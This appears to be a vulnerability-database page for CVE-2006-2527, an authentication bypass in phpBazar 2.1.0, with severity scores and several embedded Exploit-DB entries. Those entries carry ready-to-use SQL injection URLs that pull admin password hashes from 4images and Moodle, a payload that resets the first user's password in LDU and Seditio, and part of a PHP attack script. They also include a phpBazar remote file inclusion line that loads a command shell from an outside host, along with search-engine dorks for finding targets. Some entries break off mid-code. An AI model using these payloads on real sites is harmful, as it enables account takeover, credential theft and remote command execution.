CVE-2006-2527
published 2006-05-22CVE-2006-2527: Admin/admin.php in phpBazar 2.1.0 and earlier allows remote attackers to bypass the authentication process and gain unauthorized access to the administrative…
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.35%
87.2th percentile
Admin/admin.php in phpBazar 2.1.0 and earlier allows remote attackers to bypass the authentication process and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| smartisoft | phpbazar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
4Images 1.7.1 - SQL Injection
exploitdb·2009-12-20
CVE-2006-5236 4Images 1.7.1 - SQL Injection
4Images 1.7.1 - SQL Injection
---
# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]
~ Script Name : 4images 1.7.1
~ Language : php
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
Dork : Powered By: 4images 1.7.1
./Exploit:
first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1
now we have the admin username
now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
admin = admin username
Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin
--------------------------------------------------
Exploit-DB
LDU 8.x - avatarselect id SQL Injection
exploitdb·2006-11-21
CVE-2006-6577 LDU 8.x - avatarselect id SQL Injection
LDU 8.x - avatarselect id SQL Injection
---
LDU http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of LDU to 123456
The XVALUE comes with your avatarselect link it's special to everyuser in LDU.
For using this vulnerability you must be logged in to LDU...
# nukedx.com [2006-11-21]
# milw0rm.com [2006-11-21]
Exploit-DB
Seditio 1.10 - avatarselect id SQL Injection
exploitdb·2006-11-21
CVE-2006-6177 Seditio 1.10 - avatarselect id SQL Injection
Seditio 1.10 - avatarselect id SQL Injection
---
Seditio http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
For using this vulnerability you must be logged in to Seditio...
# nukedx.com [2006-11-21]
# milw0rm.com [2006-11-21]
Exploit-DB
4Images 1.7.x - 'search.php' SQL Injection
exploitdb·2006-10-08
CVE-2006-5236 4Images 1.7.x - 'search.php' SQL Injection
4Images 1.7.x - 'search.php' SQL Injection
---
#!/usr/bin/php
//search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN
[w4ck1ng] - w4ck1ng.com
*/
if(!$argv[3]){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if(eregi("http://", $argv[1])){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if($argv[3]=="-d"){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27"
Exploit-DB
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection
exploitdb·2006-10-08
CVE-2006-5219 Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection
---
source: https://www.securityfocus.com/bid/20395/info
Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Moodle 1.6.2 is reported vulnerable; prior versions may also be affected.
http://www.example.com/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20
FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20F
ROM%
Exploit-DB
phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
exploitdb·2006-05-19
CVE-2006-2528 phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
---
Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar
Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1
# milw0rm.com [2006-05-19]
No writeups or analysis indexed.
http://secunia.com/advisories/20198http://www.osvdb.org/25701http://www.securityfocus.com/archive/1/434558/100/0/threadedhttp://www.securityfocus.com/bid/18053http://www.vupen.com/english/advisories/2006/1890https://exchange.xforce.ibmcloud.com/vulnerabilities/26617http://secunia.com/advisories/20198http://www.osvdb.org/25701http://www.securityfocus.com/archive/1/434558/100/0/threadedhttp://www.securityfocus.com/bid/18053http://www.vupen.com/english/advisories/2006/1890https://exchange.xforce.ibmcloud.com/vulnerabilities/26617
2006-05-22
Published